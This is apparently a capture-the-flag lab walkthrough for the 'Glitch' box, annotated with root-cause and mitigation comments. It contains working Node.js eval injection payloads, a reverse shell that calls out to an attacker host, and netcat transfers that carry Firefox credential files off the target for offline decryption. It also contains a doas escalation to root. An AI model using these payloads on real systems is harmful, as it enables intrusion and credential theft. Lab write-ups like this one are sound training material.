My attack chain for Glitch: API fuzzing to Node.js RCE, then decrypting Firefox passwords.
# Walkthrough notes for a lab box ("Glitch"): a Node.js API that evaluates a
# query parameter, then credential recovery from a readable Firefox profile,
# then a permissive doas rule. Lines are a mix of shell commands (run on the
# attacking host or on the target, see the section comments) and URL paths
# that were typed into the browser; the URL lines are not valid shell.
export ip=<redacted>
firefox http://$ip
firefox http://$ip/api/access
# add this_is_not_real cookie in the page
# NOTE(review): the cookie is set by hand from a fixed value (presumably
# disclosed by /api/access) — a gate like this lives entirely on the client and
# gives no real protection; access control has to be enforced server-side.
firefox http://$ip
firefox http://$ip/js/script.js
# fuzz API parameters
# --hc 400 hides responses with status 400, so only parameter names the handler
# accepts remain in the output. The distinct status for unknown vs. known
# parameters is the oracle that makes this enumeration work; answering
# uniformly (same status and body) for unexpected input removes it.
wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt -X POST --hc 400 -u http://$ip/api/items\?FUZZ\=test
# EXPLOIT node js eval check
# Root cause: the handler passes the `cmd` query parameter to eval() (the
# expressions below are evaluated server-side). Mitigation: never hand request
# data to eval()/new Function(); parse the expected value type explicitly and
# reject anything else. Detection: query strings containing `require(`,
# `child_process` or `readFileSync` in the access log are a strong signal that
# this class of flaw is being probed.
firefox http://$ip/api/item?cmd=1
# The following cmd= lines are browser URL paths pasted as notes, not commands.
# NOTE(review): the path is /api/item here but /api/items in the fuzz above and
# the api.js read below — one of the two is probably a typo, confirm which.
api/item?cmd=process.cwd()
api/item?cmd=var fs=require("fs");fs.readdirSync("/var/web").toString('utf8')
api/item?cmd=var fs=require("fs");fs.readFileSync("/var/web/app.js").toString('utf8')
# view api.js
/api/items?cmd=var+fs%3drequire("fs")%3bfs.readFileSync("/var/web/routes/api.js").toString('utf8')
# ACCESS: reverse shell
# What turns the eval() into a shell is that the service account may spawn
# /bin/sh and open outbound TCP connections. Running the app as a dedicated
# low-privilege user with egress filtering limits what such a flaw yields,
# and an unexpected outbound connection from the web process is itself a
# detection opportunity.
api/item?cmd=(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "<sanitized>", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();
# target-machine
# Commands from here run on the target. The PTY is needed so interactive tools
# (su, doas) behave over the raw socket.
python3 -c 'import pty; pty.spawn("/bin/bash")'
cat /home/user/user.txt
cd /home/user/.firefox
# HORIZONTAL PRIVESC: firefox keys
# key4.db holds the NSS key that protects the entries in logins.json; with both
# files the saved credentials can be recovered offline. Risk being
# demonstrated: a browser profile readable by the account the web app runs as.
# A Firefox primary password would prevent decryption without it, and the
# profile should not be readable by the service user at all.
# transferring firefox keys
# Each `nc -l` listener runs on the attacking host; the matching `nc -nv` line
# runs on the target and pushes the file to it.
nc -l -p 1234 > key4.db < /dev/null
nc -nv <redacted> 1234 < key4.db
nc -l -p 1234 > logins.json < /dev/null
nc -nv <redacted> 1234 < logins.json
# firepwd firefox
# NOTE(review): -d is the profile directory; `/` looks unlikely to be the
# intended argument given the files were copied elsewhere — confirm the path.
python firepwd.py -d /
su v0id # pass: love_the_void
# VERTICAL PRIVESC: doas
# Finding: the doas rule lets v0id run arbitrary commands as root (the
# /bin/bash line succeeds). Whether a password is required cannot be told from
# here. Mitigation: scope doas rules to the specific commands needed and alert
# on doas-to-root sessions from service or shared accounts.
doas -u root whoami
doas -u root /bin/bash
cat /root/root.txt